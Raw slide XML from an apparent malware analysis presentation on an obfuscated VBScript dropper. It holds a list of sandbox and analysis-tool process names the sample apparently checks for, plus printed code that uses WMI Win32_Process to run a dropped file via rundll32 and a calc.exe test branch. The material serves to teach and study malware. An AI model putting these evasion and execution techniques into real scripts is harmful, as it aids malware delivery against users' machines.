            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"iris.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"qqprotect.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"totalcmd.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"cports.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"joeboxcontrol.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"qqsg.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"trojdie.kvpcrossfire.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"joeboxserver.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"raptorclient.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"txplatform.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295500" y="1152475"/>
            <a:ext cx="1740900" cy="3771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900"/>
              <a:t>"dnf.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"lamer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"regmon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"virus.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"dsniff.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"LogHTTP.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"regshot.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"vx.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"dumpcap.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"lordpe.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"RepMgr64.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"winalysis.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"emul.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"malmon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"RepUtils32.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"winapioverride32.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"ethereal.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"mbarun.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"RepUx.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"windbg.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"ettercap.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"mdpmon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"runsample.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"windump.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"fakehttpserver.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="9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474" name="Shape 474"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="Google Shape;475;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ERa() - F_RUN - execute the dropped file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;p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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set setupService = GetObject("winmg" + "mts:Win32_Pro" + "cess")  ' &lt;&lt;&lt;snipped&gt;&gt;&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tawny</a:t>
            </a:r>
            <a:endParaRPr sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 With WScript</a:t>
            </a:r>
            <a:endParaRPr sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   		 .Sleep Int((chivalrous-pbI+1)*Rnd+pbI)</a:t>
            </a:r>
            <a:endParaRPr sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 End With</a:t>
            </a:r>
            <a:endParaRPr sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 avlt =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> "rundll32" + " " + sandhill + "racial.drc" + ",DllRegisterServer":setupService.create avlt</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 GewqX("DEBUG: F_RUN_W - True")</a:t>
            </a:r>
            <a:endParaRPr sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 DlAMe("-")</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 nimbus</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>—------------------</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executes the command line:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rundll32 %TMP%\racial.drc, DllRegisterServer</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk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480" name="Shape 480"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p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ERa() - F_RUN - if testing…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p7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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set setupService = GetObject("winmg" + "mts:Win32_Pro" + "cess")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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>(InStr(WScript.ScriptName, cStr(82984))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; 0 And ucMHV = 0) Then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tawny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With WScript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.Sleep Int((chivalrous-pbI+1)*Rnd+pbI)</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End With</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r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>desperate = "ca" + "lc.e" + "xe"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>setupService.create desperate</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
